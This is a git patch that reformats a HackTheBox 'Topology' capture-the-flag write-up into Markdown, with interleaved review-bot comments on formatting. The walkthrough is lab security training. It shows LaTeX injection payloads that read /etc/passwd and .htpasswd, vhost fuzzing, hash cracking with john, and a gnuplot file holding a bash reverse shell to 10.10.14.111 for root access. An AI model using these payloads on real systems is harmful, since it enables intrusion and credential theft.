From 8f3318b5844fb8914367a212c8239fa7ab8583c7 Mon Sep 17 00:00:00 2001
From: ARZ <60057481+AbdullahRizwan101@users.noreply.github.com>
Date: Sat, 4 Nov 2023 15:54:50 +0500
Subject: [PATCH] Update Topology.md
---
HackTheBox/Topology.md | 119 ++++++++++++++++++++++++++++++++---------
1 file changed, 95 insertions(+), 24 deletions(-)
diff --git a/HackTheBox/Topology.md b/HackTheBox/Topology.md
index 46ec392..8f5eb60 100644
--- a/HackTheBox/Topology.md
+++ b/HackTheBox/Topology.md
@@ -1,6 +1,8 @@
-HackTheBox - Topology
-NMAP
+# HackTheBox - Topology
+## NMAP
+
+```bash
Nmap scan report for 10.10.11.217
Host is up (0.20s latency).
Not shown: 65533 closed tcp ports (reset)
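Review bot: the fence opened on the `+```bash` line wraps Nmap scan output, not a shell command, so highlighters will colour it as bash; a plain ``` or ```text fence is the better label. Note also that the matching closing fence is only added in the next hunk, so the file does not render correctly unless both hunks land together.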
@@ -16,27 +18,50 @@ PORT STATE SERVICE VERSION
|_http-title: Miskatonic University | Topology Group
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+```
-PORT (80)
+## PORT (80)
Visiting the webserver, we'll have a static page
-This page lists software projects, out of which Latex Equation Generator takes us to `latex.topology.htb
+
-Adding the domain name in /etc/hosts file
+This page lists software projects, out of which Latex Equation Generator
+takes us to `latex.topology.htb
-Putting \input{/etc/passwd} will result to an illegal command
+
+
+
+
+Adding the domain name in `/etc/hosts` file
+
+
+
+
+
+Putting `\input{/etc/passwd}` will result to an illegal command
+
+
+
+
Most of the commands were blacklisted, we can only read the first line of files with:
+```tex
\newread\file
\openin\file=/etc/passwd
\read\file to\line
\text{\line}
\closein\file
+```
+
+
+
+
We can make it read more lines but the limit was 3-4 lines
+```tex
\newread\file
\openin\file=/etc/passwd
\read\file to\line
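Review bot: the inline code span on `+takes us to `latex.topology.htb` is never closed (the same defect is carried over from the removed line), so everything after it renders as code until the next backtick; add the closing backtick after `latex.topology.htb`. The runs of four and five empty `+` lines after "Adding the domain name..." and "Putting `\input{/etc/passwd}`..." look like placeholders for screenshots that were not committed; either add the image links or collapse them to a single blank line. Minor wording: "will result to an illegal command" should read "results in an illegal command error".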
@@ -48,47 +73,93 @@ We can make it read more lines but the limit was 3-4 lines
\read\file to\line
\text{\line}
\closein\file
+```
+
Exceeding 4 lines, we'll get an error
+
-Visiting the site the site with it's root directory / will reveal directory listing having tempfolder, in that folder we'll find texput.log
+Visiting the site the site with it's root directory `/` will reveal directory listing having `tempfolder`, in that folder we'll find `texput.log`
-So `\write18` is restricted, we cannot use it to execute commands neither read files, we can try fuzzing for vhosts using `wfuzz ` ```bash wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://topology.htb' -H "Host: FUZZ.topology.htb" --hh 6767 ```
+
-This finds two more vhosts, dev and stats, stats site doesn't really have much
+
+So `\write18` is restricted, we cannot use it to execute commands neither read files, we can try fuzzing for vhosts using `wfuzz
+`
+```bash
+wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u 'http://topology.htb' -H "Host: FUZZ.topology.htb" --hh 6767
+```
+
+
+
+This finds two more vhosts, `dev` and `stats`, stats site doesn't really have much
+
+
Dev site asks for credentials to access the site
-Since the latex on the site is using inline math mode , we can try using lsinputlisting for reading local files and we need to use it with $ at the beginning and ending of the latex command
+
+Since the latex on the site is using `inline math mode` , we can try using `lsinputlisting` for reading local files and we need to use it with `$` at the beginning and ending of the latex command
+
+```tex
$\lstinputlisting{/etc/passwd}$
+```
-With this we can access the whole /etc/passwd file and see that the sites are being hosted in /var/www
+
-We can read /var/www/dev/.htaccess file which shows that there's .htpasswd file
+With this we can access the whole /etc/passwd file and see that the sites are being hosted in `/var/www`
-vadaisley's hash can be cracked with john
+
+We can read `/var/www/dev/.htaccess` file which shows that there's `.htpasswd` file
+
+
+
+
+
+`vadaisley's` hash can be cracked with john
+
+```bash
john --wordlist=/usr/share/wordlists/rockyou.txt ./hash.txt
+```
+
+
And now we can login through ssh
-Checking sudo -l this user cannot run any commands as root or any user
+
-In /opt there's folder gnuplot where we have only write access
+Checking `sudo -l` this user cannot run any commands as root or any user
-From pspy we see gnuplot being ran as the root user and executing plt files
+
-We can create a plt file with a bash reverse shell and move it in /opt/gnuplot
+In `/opt` there's folder `gnuplot` where we have only write access
+
+
+From `pspy` we see gnuplot being ran as the root user and executing plt files
+
+
+
+We can create a plt file with a bash reverse shell and move it in `/opt/gnuplot`
+
+```bash
system "bash -i >& /dev/tcp/10.10.14.111/2222 0>&1"
+```
-After few seconds we'll see our plt being executed as root and receive a connection on our listener with a root shell
+
-References
+After few seconds we'll see our plt being executed as root and receive a connection on our listener with a root shell
- https://0day.work/hacking-with-latex/
- https://texdoc.org/serve/latex2e.pdf/0
- https://www1.cmc.edu/pages/faculty/aaksoy/latex/latexthree.html
- https://en.wikibooks.org/wiki/LaTeX/Source_Code_Listings
- http://www.gnuplot.info/docs_4.2/node327.html
+
+
+
+
+## References
+
+- https://0day.work/hacking-with-latex/
+- https://texdoc.org/serve/latex2e.pdf/0
+- https://www1.cmc.edu/pages/faculty/aaksoy/latex/latexthree.html
+- https://en.wikibooks.org/wiki/LaTeX/Source_Code_Listings
+- http://www.gnuplot.info/docs_4.2/node327.html
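Review bot: the old reference list is not actually removed. Only the bare `References` heading line is deleted, while the five unchanged `- https://...` entries remain as context, so after this patch the file carries the list twice: once with no heading and once under the new `## References` heading. Delete the first copy. Further points in this hunk: the inline code span for wfuzz is split across two lines (an opening backtick before `wfuzz` and the closing one alone on the next line), which breaks the span; the prose says `lsinputlisting` while the fenced command is `\lstinputlisting`, so the name in the sentence should match the code; the gnuplot `system "..."` block is fenced as `bash` although it is a gnuplot script line, so label it `gnuplot` or leave the fence untagged; "Visiting the site the site with it's root directory" should be "Visiting the site with its root directory"; `/etc/passwd` on the "With this we can access..." line is the only path left without backticks, and the backticks around `vadaisley's` should enclose only the username.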